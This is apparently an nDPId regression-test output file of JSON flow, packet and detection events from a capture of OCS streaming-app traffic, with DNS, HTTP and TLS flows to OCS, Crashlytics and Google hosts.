+00980{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"ocs.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1449652786152,"flow_last_seen":1449652787289,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1449652787289,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"23.21.230.199","src_port":39263,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Crashlytics","breed":"Acceptable","category":"DataTransfer"},"tls": {"version":"TLSv1","client_requested_server_name":"settings.crashlytics.com","ja3":"b030dba3ca09e2e484b9fa75adc4039c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"ocs.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652787507,"flow_last_seen":1449652787507,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1449652787507,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":3621,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"ocs.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1449652787507,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":77,"pkt_l4_len":57,"thread_ts_msec":1449652787507,"pkt":"RQAATYLzQABAETLywKi0AggICAgOJQA1ADki+CcDAQAAAQAAAAAAAAR4bXBwCGRldmljZTA2BGV1MDEIY2FwcHRhaW4DY29tAAABAAE="} +00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"ocs.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652787507,"flow_last_seen":1449652787507,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1449652787507,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":3621,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"xmpp.device06.eu01.capptain.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"ocs.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652787596,"flow_last_seen":1449652787596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652787596,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.131.52","src_port":46166,"dst_port":5122,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 
+00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"ocs.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1449652787596,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652787596,"pkt":"RQAAPDy4QABABnydwKi0AomHgzS0VhQCr\/++QwAAAACgAjkI08UAAAIEBbQEAggKADWC+wAAAAABAwMG"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652787983,"flow_last_seen":1449652787983,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652787983,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":49881,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1449652787983,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652787983,"pkt":"RQAAPMDbQABABoIGwKi0ArL40DbC2QBQ64tD+QAAAACgAjkIoRgAAAIEBbQEAggKADWDIgAAAAABAwMG"} 
+00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"ocs.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652788016,"flow_last_seen":1449652788016,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1449652788016,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":2589,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"ocs.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1449652788016,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":61,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":61,"pkt_l4_len":41,"thread_ts_msec":1449652788016,"pkt":"RQAAPYMlQABAETLQwKi0AggICAgKHQA1ACmDzlLQAQAAAQAAAAAAAANvY3MIbGFiZ2VuY3kCd3MAAAEAAQ=="} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"ocs.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652788016,"flow_last_seen":1449652788016,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1449652788016,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":2589,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.OCS","breed":"Fun","category":"Media"},"dns": {"query":"ocs.labgency.ws","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1449652788067,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652788067,"pkt":"RQAANMDcQABABoINwKi0ArL40DbC2QBQ64tD+t7mVuSAEADljSkAAAEBCAoANYMrRwX98w=="} +01332{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1449652788082,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":715,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":715,"pkt_l4_len":695,"thread_ts_msec":1449652788082,"pkt":"RQACy8DdQABABn91wKi0ArL40DbC2QBQ64tD+t7mVuSAGADltWEAAAEBCAoANYMsRwX981BPU1QgL2NhdGFsb2cvdm9kP3Y9MyBIVFRQLzEuMQ0KWC1MZ3ktSHNzLUE6IEZGRTg2OUEyLTMzQUQtQTU0QS1CRUMwLTcyMTBEMDNDODM1Qi0yNTk0RDYzRA0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpYLUxneS1IU1MtU2VydmljZS1JZDogb2ZyLm9jcw0KWC1MZ3ktSFNTLVJvbS1JZDogc2Ftc3VuZy9HVC1QNzUxMC9BbmRyb2lkLzQuMC40L1hXTFA2L2FybXY3bF8xMDAwLjBNSHpfMTk5OC44NEJvZ29NaXBzX2ZlYXR1cmVzKHN3cCxoYWxmLHRodW1iLGZhc3RtdWx0LHZmcCxlZHNwLHZmcHYzLHZmcHYzZDE2LHRscylfY29yZXM9Mi8xMjgweDc1Mi9mYWxzZQ0KQ29udGVudC1MZW5ndGg6IDIxNw0KSG9zdDogb2N1MDMubGFiZ2VuY3kud3MNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEFwYWNoZS1IdHRwQ2xpZW50L1VOQVZBSUxBQkxFIChqYXZhIDEuNCkNCg0KPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPGxneXJlcXVlc3QgbW9kdWxlPSJDTS9WT0QiPgoJPGFjdGlvbiBuYW1lPSJnZXRDYXRhbG9nRW50cmllcyI+CgkJPHBhcmFtIG5hbWU9IndpdGhDdXN0b21EYXRhIiB2YWx1ZT0iZmFsc2UiLz4KCQk8cGFyYW0gbmFtZT0iZXh0ZXJuYWxJZCIgdmFsdWU9ImZhbHNlIi8+Cgk8L2FjdGlvbj4KPC9sZ3lyZXF1ZXN0Pg=="} 
+00803{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652787983,"flow_last_seen":1449652788082,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":221,"midstream":0,"thread_ts_msec":1449652788082,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":49881,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"},"http": {"hostname":"ocu03.labgency.ws","url":"ocu03.labgency.ws\/catalog\/vod?v=3","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"ocs.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652788109,"flow_last_seen":1449652788109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652788109,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":36680,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"ocs.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1449652788109,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652788109,"pkt":"RQAAPDlmQABABgl8wKi0ArL40DaPSAG7xoy6SQAAAACgAjkIgeAAAAIEBbQEAggKADWDLwAAAAABAwMG"} 
+00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"ocs.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1449652788188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652788188,"pkt":"RQAANDlnQABABgmDwKi0ArL40DaPSAG7xoy6Sjpn3PmAEADljD4AAAEBCAoANYM3RwX+EQ=="} +00725{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"ocs.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1449652788195,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":260,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":260,"pkt_l4_len":240,"thread_ts_msec":1449652788195,"pkt":"RQABBDloQABABgiywKi0ArL40DaPSAG7xoy6Sjpn3PmAGADlDAsAAAEBCAoANYM3RwX+ERYDAQDLAQAAxwMBVmhd83GqZqYQO3oMbwUHPK3VU0gJzqNSdwnP4gncj8QAAEYABAAFAC8ANcACwATABcAMwA7AD8AHwAnACsARwBPAFAAzADkAMgA4AArAA8ANwAjAEgAWABMACQAVABIAAwAIABQAEQD\/AQAAWAAAABQAEgAAD29jcy5sYWJnZW5jeS53cwALAAQDAAECAAoANAAyAAEAAgADAAQABQAGAAcACAAJAAoACwAMAA0ADgAPABAAEQASABMAFAAVABYAFwAYABk="} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"ocs.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652788109,"flow_last_seen":1449652788195,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1449652788195,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":36680,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.OCS","breed":"Fun","category":"Media"},"tls": 
{"version":"TLSv1","client_requested_server_name":"ocs.labgency.ws","ja3":"0534a22b266a64a5cc9a90f7b5c483cc","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"ocs.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1449652788595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652788595,"pkt":"RQAAPDy5QABABnycwKi0AomHgzS0VhQCr\/++QwAAAACgAjkI02AAAAIEBbQEAggKADWDYAAAAAABAwMG"} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"ocs.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1449652790602,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652790602,"pkt":"RQAAPDy6QABABnybwKi0AomHgzS0VhQCr\/++QwAAAACgAjkI0pgAAAIEBbQEAggKADWEKAAAAAABAwMG"} +00812{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1449652787983,"flow_last_seen":1449652790713,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1449652790713,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":49881,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"},"http": {"hostname":"ocu03.labgency.ws","url":"ocu03.labgency.ws\/catalog\/vod?v=3","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} 
+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"ocs.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1449652792355,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652792355,"pkt":"RQAAPKb0QABABiV3wKi0AkDpuLy6UxRsAv3YCQAAAACgAjkIcdQAAAIEBbQEAggKADWE2AAAAAABAwMG"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":241,"source":"ocs.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652797357,"flow_last_seen":1449652797357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652797357,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.184.188","src_port":32946,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"ocs.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1449652797357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652797357,"pkt":"RQAAPAMUQABABslXwKi0AkDpuLyAsgG7QZiF2AAAAACgAjkIz8gAAAIEBbQEAggKADWGzAAAAAABAwMG"} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"ocs.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1449652797427,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652797427,"pkt":"RQAANAMVQABABslewKi0AkDpuLyAsgG7QZiF2aTu9RqAEADl+L8AAAEBCAoANYbSHkOFlA=="} 
+00744{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"ocs.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1449652797442,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":271,"pkt_l4_len":251,"thread_ts_msec":1449652797442,"pkt":"RQABDwMWQABABsiCwKi0AkDpuLyAsgG7QZiF2aTu9RqAGADlVfIAAAEBCAoANYbUHkOFlBYDAQDWAQAA0gMD4HuK+eOlMdUOH1cZsMt60He+NukWbTB7f1JNaYrt+NsAACjAK8AswC\/AMACeAJ\/ACcAKwBPAFAAzADnAB8ARAJwAnQAvADUABQD\/AQAAgQAAABUAEwAAEG10YWxrLmdvb2dsZS5jb20ACwAEAwABAgAKADQAMgAOAA0AGQALAAwAGAAJAAoAFgAXAAgABgAHABQAFQAEAAUAEgATAAEAAgADAA8AEAARACMAAAANACAAHgYBBgIGAwUBBQIFAwQBBAIEAwMBAwIDAwIBAgICAw=="} +00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":243,"source":"ocs.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652797357,"flow_last_seen":1449652797442,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":219,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1449652797442,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.184.188","src_port":32946,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mtalk.google.com","ja3":"75edb912bc6f0a222ae3e3e47f5c89b1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":269,"source":"ocs.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652798230,"flow_last_seen":1449652798230,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1449652798230,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":11793,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"ocs.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1449652798230,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":65,"pkt_l4_len":45,"thread_ts_msec":1449652798230,"pkt":"RQAAQYcjQABAES7OwKi0AggICAguEQA1AC1oEnazAQAAAQAAAAAAAARwbGF5Cmdvb2dsZWFwaXMDY29tAAABAAE="} +00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"ocs.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652798230,"flow_last_seen":1449652798230,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1449652798230,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":11793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"play.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":270,"source":"ocs.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652798305,"flow_last_seen":1449652798305,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652798305,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.166.95","src_port":47803,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} +00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"ocs.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1449652798305,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652798305,"pkt":"RQAAPHAIQABABm7AwKi0AkDppl+6uwG7gNP3IgAAAACgAjkI9zgAAAIEBbQEAggKADWHKgAAAAABAwMG"} +00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"ocs.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1449652798386,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652798386,"pkt":"RQAANHAJQABABm7HwKi0AkDppl+6uwG7gNP3IxI082eAEADlT7wAAAEBCAoANYczAMsH6w=="} 
+00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"ocs.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1449652798392,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":236,"pkt_l4_len":216,"thread_ts_msec":1449652798392,"pkt":"RQAA7HAKQABABm4OwKi0AkDppl+6uwG7gNP3IxI082eAGADln0MAAAEBCAoANYczAMsH6xYDAQCzAQAArwMBVmhd\/avXwE9Hbo+g4bJoaBoe\/PaQpNdc4O0Q8a7HcbYAAEYABAAFAC8ANcACwATABcAMwA7AD8AHwAnACsARwBPAFAAzADkAMgA4AArAA8ANwAjAEgAWABMACQAVABIAAwAIABQAEQD\/AQAAQAALAAQDAAECAAoANAAyAAEAAgADAAQABQAGAAcACAAJAAoACwAMAA0ADgAPABAAEQASABMAFAAVABYAFwAYABk="} +00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":272,"source":"ocs.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652798305,"flow_last_seen":1449652798392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1449652798392,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"64.233.166.95","src_port":47803,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"5a236bfc3d18ddef1b1f2f4c9e765d66","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":863,"source":"ocs.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652842535,"flow_last_seen":1449652842535,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1449652842535,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":24245,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":863,"source":"ocs.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1449652842535,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":56,"pkt_l4_len":36,"thread_ts_msec":1449652842535,"pkt":"RQAAOJhyQABAER2IwKi0AggICAhetQA1ACRtrFcaAQAAAQAAAAAAAAN3d3cDb2NzAmZyAAABAAE="} +00750{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":863,"source":"ocs.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652842535,"flow_last_seen":1449652842535,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1449652842535,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":24245,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.OCS","breed":"Fun","category":"Media"},"dns": {"query":"www.ocs.fr","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
